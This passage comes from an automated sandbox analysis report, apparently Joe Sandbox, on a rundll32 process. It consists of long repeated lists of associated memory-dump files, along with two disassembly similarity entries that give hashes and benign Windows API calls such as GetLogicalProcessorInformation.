            • Associated: 00000003.00000002.792199953.00000000055A3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792410666.00000000055DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792480706.00000000055E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792565742.00000000055EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792625645.00000000055F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792670857.00000000055FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792728170.0000000005607000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792767418.0000000005619000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792818608.0000000005634000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793154492.000000000566B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793241625.0000000005674000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793271025.000000000567C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793323751.0000000005686000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793395761.000000000568C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795371291.0000000005C79000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795384552.0000000005C7A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795408348.0000000005C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795549487.0000000005CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795572264.0000000005CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.796910956.0000000005E72000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.796959732.0000000005E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797046071.0000000005EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797075353.0000000005EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797107663.0000000005EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797131046.0000000005EA9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797147559.0000000005EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797167397.0000000005EAD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797203345.0000000005EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797235898.0000000005EB7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797261926.0000000005EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797289094.0000000005EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797380490.0000000005EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797399805.0000000005EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797427924.0000000005EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799141819.0000000006065000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799163616.0000000006069000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799181654.000000000606B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799199067.000000000606D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799219580.0000000006079000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799236013.000000000607B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799261906.000000000607D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799287767.0000000006083000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799311292.0000000006087000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799330344.0000000006089000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799370228.0000000006093000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799389742.0000000006095000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799534762.00000000060C2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800585452.0000000006191000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800602949.0000000006193000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800651803.00000000061A1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800668075.00000000061A5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800693665.00000000061A7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800719211.00000000061A9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800734506.00000000061AB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800760531.00000000061AD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800855699.00000000061BD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800873052.00000000061BF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800898785.00000000061C1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801021151.00000000061EC000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801141100.0000000006209000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801159221.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801188471.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801214324.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801257035.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801284190.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_4780000_rundll32.jbxd
            Similarity
            • API ID: CriticalSection$Leave$Enter
            • String ID: en-US,en,
            • API String ID: 2978645861-3579323720
            • Opcode ID: fc795c57515a529c7026eac70e023a0b8ecac3f791e8229b1a9df23e755e8e79
            • Instruction ID: 71c3fb6234043077282b5ad0b2f568cdad7417aea84e140096b91666cac99b4e
            • Opcode Fuzzy Hash: fc795c57515a529c7026eac70e023a0b8ecac3f791e8229b1a9df23e755e8e79
            • Instruction Fuzzy Hash: 5A2163707C02057BFB31BB7988196292AB5EB45748F50487EA000D7394DEA4BC4097B6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04789222
            • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,047892A2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04789256
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.772501867.0000000004781000.00000020.00000001.01000000.00000003.sdmp, Offset: 04780000, based on PE: true
            • Associated: 00000003.00000002.772422197.0000000004780000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.772897308.000000000479C000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780309338.0000000004B82000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780530752.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780584175.0000000004BA6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780617990.0000000004BA7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780648622.0000000004BAA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781496992.0000000004C23000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781647162.0000000004C35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781695837.0000000004C54000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781719382.0000000004C56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781797553.0000000004C60000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781987994.0000000004C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782034730.0000000004C92000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782076110.0000000004C9B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782122326.0000000004CA3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782172568.0000000004CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782223427.0000000004CB1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782748394.0000000004D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782802375.0000000004D10000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782874294.0000000004D19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782936929.0000000004D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783032796.0000000004D38000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783056196.0000000004D3A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783108903.0000000004D45000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783332063.0000000004D70000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783440962.0000000004D76000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783489163.0000000004D7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783564443.0000000004D87000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783644906.0000000004D8D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783709060.0000000004D95000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783739820.0000000004D97000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783824101.0000000004D9F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783847290.0000000004DA1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784174202.0000000004DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784266398.0000000004DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784308125.0000000004DFD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784356698.0000000004E19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784416791.0000000004E26000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784450628.0000000004E34000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784488628.0000000004E41000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784540682.0000000004E51000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784593308.0000000004E58000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784647583.0000000004E62000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784696979.0000000004E6C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784749137.0000000004E72000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784796381.0000000004E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784845165.0000000004E80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.784887249.0000000004E89000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786393206.0000000004FB8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786502053.0000000004FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786518292.0000000004FC5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786562034.0000000004FDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786692923.0000000005029000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786717525.0000000005032000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786750870.0000000005038000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786807129.0000000005041000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786844364.000000000504A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.786870431.000000000504C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787133376.000000000509A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787183309.00000000050A9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787214091.00000000050C6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787253493.00000000050D2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787381530.00000000050FD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787404713.0000000005106000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787448550.000000000510E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787492011.000000000511B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787543557.0000000005127000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787578074.000000000512D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787606155.000000000513B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.787903965.000000000517F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788032666.000000000518F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788091859.00000000051AE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788319268.00000000051E4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788371033.00000000051EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788419786.00000000051F6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788469769.0000000005202000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788520479.000000000520D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788582822.0000000005214000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788625366.0000000005221000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788947647.0000000005261000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.788986816.000000000526A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789055886.0000000005293000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789466802.00000000052D0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789514716.00000000052DB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789572633.00000000052E8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789618727.00000000052EE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.789678515.00000000052F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.790744869.0000000005429000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.790829465.0000000005453000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791160516.000000000549E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791210590.00000000054A8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791252639.00000000054B2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791299968.00000000054B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791328043.00000000054C1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791540374.0000000005510000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791626415.000000000552B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791659807.0000000005533000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791697969.000000000553B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791722381.0000000005548000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791847010.0000000005575000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791906382.000000000557B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.791988817.0000000005583000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792026717.000000000558B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792151975.0000000005599000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792199953.00000000055A3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792410666.00000000055DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792480706.00000000055E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792565742.00000000055EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792625645.00000000055F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792670857.00000000055FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792728170.0000000005607000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792767418.0000000005619000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.792818608.0000000005634000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793154492.000000000566B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793241625.0000000005674000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793271025.000000000567C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793323751.0000000005686000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.793395761.000000000568C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795371291.0000000005C79000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795384552.0000000005C7A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795408348.0000000005C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795549487.0000000005CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.795572264.0000000005CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.796910956.0000000005E72000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.796959732.0000000005E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797046071.0000000005EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797075353.0000000005EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797107663.0000000005EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797131046.0000000005EA9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797147559.0000000005EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797167397.0000000005EAD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797203345.0000000005EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797235898.0000000005EB7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797261926.0000000005EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797289094.0000000005EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797380490.0000000005EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797399805.0000000005EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.797427924.0000000005EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799141819.0000000006065000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799163616.0000000006069000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799181654.000000000606B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799199067.000000000606D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799219580.0000000006079000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799236013.000000000607B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799261906.000000000607D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799287767.0000000006083000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799311292.0000000006087000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799330344.0000000006089000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799370228.0000000006093000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799389742.0000000006095000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799534762.00000000060C2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800585452.0000000006191000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800602949.0000000006193000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800651803.00000000061A1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800668075.00000000061A5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800693665.00000000061A7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800719211.00000000061A9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800734506.00000000061AB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800760531.00000000061AD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800855699.00000000061BD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800873052.00000000061BF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800898785.00000000061C1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801021151.00000000061EC000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801141100.0000000006209000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801159221.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801188471.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801214324.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801257035.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801284190.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_4780000_rundll32.jbxd
            Similarity
            • API ID: InformationLogicalProcessor
            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
            • API String ID: 1773637529-79381301
            • Opcode ID: ca80dd7d1f6dd4924e408cdf504727e566a41f7e178896f08bf582f6dac976e3
            • Instruction ID: 1f896a6ef26d1f91e5c19b1684326dd60004ec7175b293655fed863373e3f2eb
            • Opcode Fuzzy Hash: ca80dd7d1f6dd4924e408cdf504727e566a41f7e178896f08bf582f6dac976e3
            • Instruction Fuzzy Hash: F61172F1D84208BEEB10FBA6DA48ABDB7F4EB44318F50809DEA04A7740D775AA408B10
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.772501867.0000000004781000.00000020.00000001.01000000.00000003.sdmp, Offset: 04780000, based on PE: true
            • Associated: 00000003.00000002.772422197.0000000004780000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.772897308.000000000479C000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780309338.0000000004B82000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780530752.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780584175.0000000004BA6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780617990.0000000004BA7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.780648622.0000000004BAA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781496992.0000000004C23000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781647162.0000000004C35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781695837.0000000004C54000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781719382.0000000004C56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781797553.0000000004C60000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.781987994.0000000004C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782034730.0000000004C92000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782076110.0000000004C9B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782122326.0000000004CA3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782172568.0000000004CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782223427.0000000004CB1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782748394.0000000004D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782802375.0000000004D10000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782874294.0000000004D19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.782936929.0000000004D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783032796.0000000004D38000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783056196.0000000004D3A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783108903.0000000004D45000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783332063.0000000004D70000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783440962.0000000004D76000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783489163.0000000004D7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783564443.0000000004D87000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783644906.0000000004D8D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783709060.0000000004D95000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783739820.0000000004D97000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783824101.0000000004D9F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.783847290.0000000004DA1000.00000002.00000001.01000000.00000003.sdmpDownload File
